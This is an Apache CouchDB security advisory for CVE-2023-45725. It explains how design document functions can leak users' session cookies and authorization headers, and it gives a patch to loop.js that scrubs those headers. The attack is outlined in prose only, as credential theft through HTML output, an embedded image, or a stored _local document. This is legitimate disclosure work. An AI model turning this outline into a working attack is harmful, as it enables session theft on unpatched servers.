.. Licensed under the Apache License, Version 2.0 (the "License"); you may not .. use this file except in compliance with the License. You may obtain a copy of .. the License at .. .. http://www.apache.org/licenses/LICENSE-2.0 .. .. Unless required by applicable law or agreed to in writing, software .. distributed under the License is distributed on an "AS IS" BASIS, WITHOUT .. WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the .. License for the specific language governing permissions and limitations under .. the License. .. _cve/2023-45725: =========================================================================== CVE-2023-45725: Apache CouchDB: Privilege Escalation Using Design Documents =========================================================================== :Date: 12.12.2023 :Affected: 3.3.2 and below :Severity: Medium :Vendor: The Apache Software Foundation Description =========== Design document functions which receive a user http request object may expose authorization or session cookie headers of the user who accesses the document. These design document functions are: * list * show * rewrite * update An attacker can leak the session component using an HTML-like output, insert the session as an external resource (such as an image), or store the credential in a ``_local`` document with an "update" function. For the attack to succeed the attacker has to be able to insert the design documents into the database, then manipulate a user to access a function from that design document. Mitigation ========== CouchDB :ref:`3.3.3 ` scrubs the sensitive headers from http request objects passed to the query server execution environment. For versions older than :ref:`3.3.3 ` this patch applied to the ``loop.js`` file would also mitigate the issue: .. code-block:: diff diff --git a/share/server/loop.js b/share/server/loop.js --- a/share/server/loop.js +++ b/share/server/loop.js @@ -49,6 +49,20 @@ function create_nouveau_sandbox() { return sandbox; } ​ +function scrubReq(args) { + var req = args.pop() + if (req.method && req.headers && req.peer && req.userCtx) { + delete req.cookie + for (var p in req.headers) { + if (req.headers.hasOwnProperty(p) && ["authorization", "cookie"].indexOf(p.toLowerCase()) !== -1) { + delete req.headers[p] + } + } + } + args.push(req) + return args +} + // Commands are in the form of json arrays: // ["commandname",..optional args...]\n // @@ -85,7 +99,7 @@ var DDoc = (function() { var funPath = args.shift(); var cmd = funPath[0]; // the first member of the fun path determines the type of operation - var funArgs = args.shift(); + var funArgs = scrubReq(args.shift()); if (ddoc_dispatch[cmd]) { // get the function, call the command with it var point = ddoc; Workarounds =========== Avoid using design documents from untrusted sources which may attempt to access or manipulate request object's headers. Credit ====== This issue was found by Natan Nehorai and reported by Or Peles from the JFrog Vulnerability Research Team. It was also independently found by Richard Ellis and Mike Rhodes from IBM/Cloudant.